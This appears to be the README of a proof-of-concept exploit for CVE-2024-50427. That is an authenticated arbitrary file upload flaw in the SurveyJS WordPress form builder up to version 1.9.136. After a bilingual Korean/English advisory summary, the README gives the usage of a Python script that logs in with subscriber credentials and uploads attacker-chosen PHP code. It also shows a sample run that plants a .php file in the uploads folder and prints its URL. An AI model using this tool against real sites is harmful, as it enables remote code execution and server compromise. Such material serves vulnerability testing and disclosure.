
SurveyJS: 드래그 앤 드롭 WordPress 폼 빌더 <= 1.9.136 - 인증된 (구독자+) 임의 파일 업로드
SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - 인증된 (Subscriber+) 임의 파일 업로드
다양한 복잡도의 여러 양식을 생성, 스타일 지정, 삽입할 수 있는 WordPress용 플러그인인 SurveyJS: Drag & Drop WordPress Form Builder는 1.9.136까지의 모든 버전에서 파일 유형 검증이 누락되어 임의 파일 업로드에 취약합니다. 이로 인해 Subscriber(구독자) 수준 이상의 접근 권한을 가진 인증된 공격자가 영향을 받는 사이트의 서버에 임의의 파일을 업로드할 수 있으며, 이로 인해 원격 코드 실행이 가능해질 수 있습니다.
Published: 2024-10-24 00:00:00
CVE: CVE-2024-50427
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: surveyjs
usage: CVE-2024-50427.py [-h] [--code CODE] url username password
Upload a PHP file to a WordPress site.
positional arguments:
url The URL of the WordPress site (e.g., http://example.com)
username Your WordPress username
password Your WordPress password
options:
-h, --help show this help message and exit
--code CODE PHP code to execute
$ python3 CVE-2024-50427.py http://kubernetes.docker.internal [email protected] user --code "phpinfo();"
Login successful.
File uploaded successfully.
http://kubernetes.docker.internal/wp-content/uploads/surveyjs/158718452672e02bd1d7212.25114025.php